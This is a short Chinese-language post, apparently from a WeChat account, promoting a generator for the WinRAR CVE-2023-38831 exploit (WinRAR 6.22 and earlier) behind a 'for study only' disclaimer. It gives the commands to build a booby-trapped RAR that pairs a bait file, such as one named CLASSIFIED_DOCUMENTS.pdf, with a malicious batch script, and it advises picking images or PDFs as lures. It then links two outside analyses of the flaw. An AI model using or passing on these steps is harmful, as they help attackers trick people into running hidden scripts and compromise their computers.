本公众号所发布的文章及工具只限交流学习,本公众号不承担任何责任!如有侵权,请告知我们立即删除。
CVE-2023-38831 winrar 漏洞利用生成器
生成用于测试的默认 poc
python cve-2023-38831-exp-gen.py poc
or
python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf script.bat poc.rar
将诱饵文件和(邪恶)脚本文件放在当前目录下,诱饵文件建议为图片(.png、jpg)或文档(.pdf)
运行以生成漏洞利用python cve-2023-38831-exp-gen.py <bait name> <script name> <output name>
受感染版本:winrar <= 6.22
https://b1tg.github.io/post/cve-2023-38831-winrar-analysis/
https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/